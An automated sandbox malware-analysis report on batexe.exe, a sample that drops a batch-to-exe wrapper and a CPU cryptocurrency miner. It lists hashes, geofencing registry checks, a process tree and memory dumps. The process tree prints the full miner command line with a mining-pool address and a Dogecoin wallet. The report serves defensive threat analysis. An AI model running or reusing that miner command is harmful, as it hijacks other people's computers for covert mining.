73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
299s
max time network
305s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
19/02/2024, 16:56

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
4236	b2e.exe
888	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
888	cpuminer-sse2.exe
888	cpuminer-sse2.exe
888	cpuminer-sse2.exe
888	cpuminer-sse2.exe
888	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1296-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1296 wrote to memory of 4236	1296	batexe.exe	82
PID 1296 wrote to memory of 4236	1296	batexe.exe	82
PID 1296 wrote to memory of 4236	1296	batexe.exe	82
PID 4236 wrote to memory of 4800	4236	b2e.exe	83
PID 4236 wrote to memory of 4800	4236	b2e.exe	83
PID 4236 wrote to memory of 4800	4236	b2e.exe	83
PID 4800 wrote to memory of 888	4800	cmd.exe	86
PID 4800 wrote to memory of 888	4800	cmd.exe	86

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1296
- C:\Users\Admin\AppData\Local\Temp\AEAF.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\AEAF.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\AEAF.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4236
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BC2C.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4800
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:888

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\AEAF.tmp\b2e.exe

Filesize
6.8MB

MD5
17117705d2dc347a2b83f892fc8751b4

SHA1
2d21928992cad4ce43191f9ed49baf4497cd9831

SHA256
f899f5e1e233562b410883a2e1845e6cf1468f62aa0fc70e375016d6f7770284

SHA512
0e226a0ac87b01790ec7168724619a35e8f80c715a636c6735c54d3f9d66c896219db58ba6f25e4a667fc58eea4da832fccd7e8f0673fdb04bf4df4313519cfa

Download Submit
C:\Users\Admin\AppData\Local\Temp\AEAF.tmp\b2e.exe

Filesize
1.4MB

MD5
fe4bc2bb4397eea601e0fa6c45cc20c6

SHA1
35477fc0a38f9db357a70f9b0573537fca582a9b

SHA256
8852fb3a8294753e6b088d458547feaf54685068ed6bc0dece93f608ab44afa7

SHA512
3759f54232069d2efba631954ff86bbf5ef58a616e4e0109c9ad5fcd632ee97ddf169ebddbe58237dbee36951c8d2e176312abe4e142f636398bff8fc2973bbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\AEAF.tmp\b2e.exe

Filesize
9.2MB

MD5
d01de7fde330c0912f6cfa275e8c4bff

SHA1
68288153133e78ff94b7236454a5efb9f62ec82d

SHA256
668f6b90a312a6766f8a28fcb865e0a387f213bf32379b618b6895b2aa4de29d

SHA512
dddb4041b14d8bb6ea34536c75076b193cf724c7de2088c2be4c5fcb04b4cab8ec3f499839616a07e92773f8b30df68f136a6d71c3760bfd936e7ad29652b0fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\BC2C.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
832KB

MD5
43dd8ab1a0fd7f177db516faa81a9635

SHA1
66a8b6940797f3396a4f1a6deafca1fda5bffcdd

SHA256
d4b58fa7e09511b58f312b57e2067823a7f31ff5cd6369cbf5ef3667c27b60ea

SHA512
064753e38fb6e2d64a8ce067a52c24b55eb11cf714a534f3557a0e2bd2f5fba16030d8496c7787f4b272ae6a696f4b017d99771488832d12711a7158c927f772

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
2.3MB

MD5
4c04147c386ba8792ac6a03069572a8a

SHA1
dda67789fc1d0f2469ca95f01a5c81034853ca6a

SHA256
c7739a1e940a282703d06eccda7110426d306f390e97fdbbd9df18472fd132cd

SHA512
a8b5a0b878a9a7d30cb38feff814e1f4dce24d000158edc10a43ee9a89920bedf7adc92eb7e3913098b6aab7fbd0531f56fc09f508b5c2769992a94e55d153db

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
512KB

MD5
a5993c0dd7587f1716037dcfe1f63091

SHA1
9a4d23ce36f5fc5791692b47d977c0bf92842879

SHA256
568cec1e1bdccf401232a78c8ecf2081fdaea221f0a7c777a69ec61307cca3e3

SHA512
c5457590162dc1a0fd6b179ba94f19e6265e2ca226ea1ec553358f568690bbc158335ee92c297ce699b2928d44702733269f82640d86bb499c1981a5903afc12

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
384KB

MD5
d1d1f36cdbccda3b96e8c164afb74526

SHA1
91bafcd404c8568c9a195ec8cbf9592ea9e17e8b

SHA256
ea6e726150aa9a8dcf9ccb6a991440b451f9f2dcc46d93cb35971556879d1d03

SHA512
2306e6578ba2217b4f32913e1ac35e0547723b873c11244e96affd05457945373c621ea16a82e1e3aa1a177e3059efc40c8585118c63a3ea145524c51d1d18c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
320KB

MD5
e63bf5df87e2ea807dc353cc5aa9aab1

SHA1
69fc94bbebe878711cb133c3a1affb80c0bdecff

SHA256
2c9d6315f90367b959d3c32badd99bbc03eb808e4a46db72ccf2e81788b41533

SHA512
70f2b2a8a4c8ab23d81266cd23b75c27ced29a1eab8c80d95c57b595b10254b7229cc03b637716edbfad2a83827f2c557847b98d1de80256beec05c9512ee4bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
256KB

MD5
f8edb8dd2fb15f1887ace09587589dd4

SHA1
cbf7cbfefc0215d9500a98d9064deb9e86787152

SHA256
0465270288d69a0ec9beb7114707bed76756c14148293237d0d35423abdfc67b

SHA512
aa993112953225280c0bedb1ebd8288298b9c22a6a884a952ba60e48cbd21c4ce60724b7adc961a0528d7c569596e3420fec2670fc47c3eb6c00c691e0378abc

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
192KB

MD5
62069650d62f76a4cdf0e81172d99993

SHA1
3b20ec5b4a4320ee15b0f7b9715a9ab90f68346e

SHA256
779a5590c667d9a704b79e159259c0646737394fd66a9c0b12d13f9445ca091c

SHA512
ae1954a84fb7543465e77a4cd5cc1bdeee0cf848592958633e6c51702b42131daae64c302d5c9537c59a9b3ba9498e5bf913d1f6f757ccdb8c4183b33224852b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
448KB

MD5
9d1a04f05f75671a5a3ffeb995176c52

SHA1
a45018bb6a5dd52b310c1eb77262354365925a76

SHA256
c777e9d786f5d1d13f78a925453804bf53ee430a38f893f115c2d1ac0f2f07ff

SHA512
d19ea63c26c1d41edd5947d0c5ae70e2461c876563c2baeb1fd4a3986254f7919f8d4c32a9d6b9f4c51c4d5a23ffa90a2011d293a106a0a8813295b2bee06e1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
192KB

MD5
625f906456510afaf916dd0384d76eee

SHA1
66c56574aff02fb199caa60ab71ca9f1c9e7fc92

SHA256
27baaef233592b03722c7d64c26d2270c0300ffb8e7f08a8e0d65212af4b848d

SHA512
041399c5ddc614d8b1a359238df8fb09258c95a0013e5139dbf4093b892395f5f78fa31fbecfee92966c5e78a5c5894005c98e559b8b5735ecf9c1995df51b17

Download Submit
memory/888-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/888-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/888-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/888-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/888-46-0x000000006E070000-0x000000006E108000-memory.dmp

Filesize
608KB

Download
memory/888-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/888-47-0x0000000000F20000-0x00000000027D5000-memory.dmp

Filesize
24.7MB

Download
memory/888-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/888-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/888-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/888-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/888-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/888-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/888-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/888-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1296-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4236-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4236-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download